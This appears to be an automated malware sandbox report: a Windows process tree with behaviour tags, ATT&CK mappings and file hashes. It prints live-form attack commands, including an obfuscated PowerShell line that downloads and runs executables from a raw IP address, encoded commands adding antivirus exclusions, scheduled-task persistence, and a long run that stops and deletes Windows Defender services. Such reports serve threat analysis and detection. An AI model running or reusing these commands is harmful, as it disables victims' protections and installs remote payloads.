C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6132 -s 8011⤵
- Program crash
PID:6012
-
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000970271\NBFRPMVB.msi" /quiet10⤵
- System Location Discovery: System Language Discovery
PID:4904
-
-
C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe"C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe"10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2344
-
-
C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe"C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3452 -
C:\Users\Admin\CamMenuMaker.exe"C:\Users\Admin\CamMenuMaker.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4492 -
C:\Users\Admin\CamMenuMaker.exeC:\Users\Admin\CamMenuMaker.exe12⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
PID:3928 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Enc UgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAJwB3AGkAdwBlAHIANwAuADUALgBlAHgAZQAnACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAdwBpAHcAZQByADcALgA1AC4AZQB4AGUAJwApACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ATwBuAGMAZQAgAC0AQQB0ACAAKABHAGUAdAAtAEQAYQB0AGUAKQAgAC0AUgBlAHAAZQB0AGkAdABpAG8AbgBJAG4AdABlAHIAdgBhAGwAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBNAGkAbgB1AHQAZQBzACAANQApACkAIAAtAFUAcwBlAHIAIAAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlACAALQBSAHUAbgBMAGUAdgBlAGwAIABIAGkAZwBoAGUAcwB0ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0AUwBlAGMAbwBuAGQAcwAgADAAKQAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAKQAgAC0ARgBvAHIAYwBlAA==13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:1352
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe12⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1052
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe9⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3824
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5852
-
-
-
C:\Users\Admin\AppData\Local\Temp\10405830101\NHq7LaU.exe"C:\Users\Admin\AppData\Local\Temp\10405830101\NHq7LaU.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:3988
-
-
C:\ProgramData\Google\Chrome\chrome.exe"C:\ProgramData\Google\Chrome\chrome.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:444
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3252
-
-
-
C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe"C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3964 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:4948
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:5024
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4908
-
-
-
C:\Users\Admin\AppData\Local\Temp\10407870101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10407870101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5220 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1892 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4FFF.tmp\5000.tmp\5001.bat C:\Users\Admin\AppData\Local\Temp\261.exe"8⤵PID:5680
-
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5964 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5186.tmp\5187.tmp\5188.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"10⤵
- Drops file in Program Files directory
PID:5992 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:1348
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:4648
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:1172
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:2104
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:3940
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5852
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4016
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:1060
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:2672
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:2008
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:5812
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:2720
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:3584
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:2612
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:2020
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:4480
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:2604
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:6068
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:1196
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:2688
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:800
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
PID:2036
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:5100
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:5800
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:608
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:1056
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:1052
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:3468
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:4292
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:3452
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:2320
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:844
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:5756
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:5940
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:4772
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:5676
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:2280
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:4368
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:1156
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:3212
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:4036
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:4332
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:4500
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:4776
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:4504
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:6104
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:3708
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:5380
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:1756
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:2668
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:2132
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:4048
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:4672
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:4516
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:6128
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:5400
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:5892
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:5432
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:4804
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:5052
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:4740
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408160101\12c306b2f8.exe"C:\Users\Admin\AppData\Local\Temp\10408160101\12c306b2f8.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4536
-
-
C:\Users\Admin\AppData\Local\Temp\10408170101\HAe88WC.exe"C:\Users\Admin\AppData\Local\Temp\10408170101\HAe88WC.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1968 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5764
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408180101\b316c3b86e.exe"C:\Users\Admin\AppData\Local\Temp\10408180101\b316c3b86e.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3044
-
-
C:\Users\Admin\AppData\Local\Temp\10408200101\PQPYAYJJ.exe"C:\Users\Admin\AppData\Local\Temp\10408200101\PQPYAYJJ.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1924 -
C:\Users\Admin\Abspawnhlp.exe"C:\Users\Admin\Abspawnhlp.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3152 -
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exeC:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:5628 -
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exeC:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe9⤵PID:5208
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe9⤵
- System Location Discovery: System Language Discovery
PID:2344
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408210101\31ccec37c4.exe"C:\Users\Admin\AppData\Local\Temp\10408210101\31ccec37c4.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3508 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10408210101\31ccec37c4.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2752
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408220101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10408220101\TbV75ZR.exe"6⤵
- Executes dropped EXE
PID:3212 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
PID:5844 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5844 -s 4728⤵
- Program crash
PID:1860
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408230101\h8NlU62.exe"C:\Users\Admin\AppData\Local\Temp\10408230101\h8NlU62.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:800 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:856
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:1892
-
-
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3832 -
C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe"C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5948 -
C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exeC:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5288 -
C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exeC:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe4⤵
- Checks computer location settings
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EP Bypass -NoP -C iex(-join([char[]](65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,101,110,118,58,84,69,77,80,44,32,36,101,110,118,58,83,121,115,116,101,109,68,114,105,118,101,92,59,32,36,112,116,97,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,54,52,55,51,50,52,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,77,83,70,46,101,120,101,32,45,111,32,36,112,116,97,59,32,115,97,112,115,32,36,112,116,97,59,32,36,112,116,98,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,56,51,50,52,49,57,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,68,80,95,85,83,69,82,46,101,120,101,32,45,111,32,36,112,116,98,59,32,115,97,112,115,32,36,112,116,98,59)))5⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:3136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe4⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5880
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Ornithoscopy\CamMenuMaker.exe"C:\Users\Admin\AppData\Local\Temp\Ornithoscopy\CamMenuMaker.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5964 -
C:\Users\Admin\AppData\Roaming\SuperJava_debugv4\CamMenuMaker.exeC:\Users\Admin\AppData\Roaming\SuperJava_debugv4\CamMenuMaker.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5004 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe4⤵PID:6060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe4⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4036
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe"C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2232 -
C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exeC:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4356 -
C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exeC:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe4⤵
- System Location Discovery: System Language Discovery
PID:2264
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6132 -ip 61321⤵PID:1740
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAEQALQBNAHAAcABSAEUARgBlAHIAZQBuAEMAZQAgAC0ARQBYAEMATABVAFMASQBPAE4AUABhAFQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAEkAbgB2AGEAbABpAGQAXABIAGUAbABwAEwAaQBuAGsALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAGYAbwByAEMAZQA7ACAAYQBEAGQALQBNAFAAUAByAEUAZgBlAHIARQBOAEMARQAgAC0ARQB4AEMAbABVAFMASQBPAE4AUAByAE8AQwBFAFMAUwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBJAG4AdgBhAGwAaQBkAFwASABlAGwAcABMAGkAbgBrAC4AZQB4AGUAIAAtAGYAbwByAGMARQA=1⤵
- Command and Scripting Interpreter: PowerShell
PID:5952
-
C:\ProgramData\hedgehog lab\Updater.exe"C:\ProgramData\hedgehog lab\Updater.exe" /u1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:5224 -
C:\Windows\TEMP\datAF32.tmp\datAF33.exeC:\Windows\TEMP\datAF32.tmp\datAF33.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3244 -
C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe"C:\Windows\system32\config\systemprofile\Abspawnhlp.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1940 -
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exeC:\Windows\system32\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4856 -
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exeC:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe5⤵PID:2428
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4588
-
C:\Users\Admin\AppData\Roaming\IsInvalid\HelpLink.exeC:\Users\Admin\AppData\Roaming\IsInvalid\HelpLink.exe1⤵
- Executes dropped EXE
PID:2012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5844 -ip 58441⤵PID:3496
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Modify Registry
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9KB
MD5ed75a4d1176292b2f2c72ce3a7b784bb
SHA1d8478dc951cdd954e87134cc16cbed2c91866fb4
SHA256a099af2306b76b701c6fd3bd3b155ebb12ef6e8dd220a1f01312cff57536e104
SHA5122ca64666b94fc3fd5568172dc9d114f156c94d328a3d520b7a20d2679d740051550b2ed01e8b5257de8fcc3db7fcd2a4d8238caa25bc5b98e3ddc7cac1e2b468
-
Filesize
9KB
MD5ca08dffb9b873998d68e502397e1c2a4
